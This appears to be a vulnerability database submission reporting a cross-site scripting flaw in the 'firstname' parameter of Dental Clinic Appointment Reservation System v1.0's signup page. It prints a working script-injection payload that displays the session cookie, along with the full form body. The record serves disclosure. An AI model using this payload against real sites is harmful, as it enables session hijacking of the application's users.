| Title | Dental Clinic Appointment Reservation System v1.0 /APR/signup.php post parameter 'firstname' exists XSS vulnerability |
|---|
| Description | An issue was discovered in Dental Clinic Appointment Reservation System v1.0.
There is a XSS vulnerability that it is possible to inject arbitrary JavaScript into the application's response via /APR/signup.php post parameter 'firstname'.
Payload:firstname=a"><script>alert(document.cookie)</script>&lastname=b&middlename=c&gender=Male&age=1&username=g&password=h&submit=&address=d&contact_no=e&email=f&code=j&cpassword=h |
|---|
| Source | ⚠️ https://github.com/nightcloudos/bug_report/blob/main/vendors/jkev/Dental%20Clinic%20Appointment%20Reservation%20System/XSS-1.md |
|---|
| User | niclo (UID 41812) |
|---|
| Submission | 02/26/2023 04:29 (3 years ago) |
|---|
| Moderation | 02/26/2023 12:49 (8 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221794 [SourceCodester Dental Clinic Appointment Reservation System 1.0 POST Parameter /APR/signup.php firstname cross site scripting] |
|---|
| Points | 20 |
|---|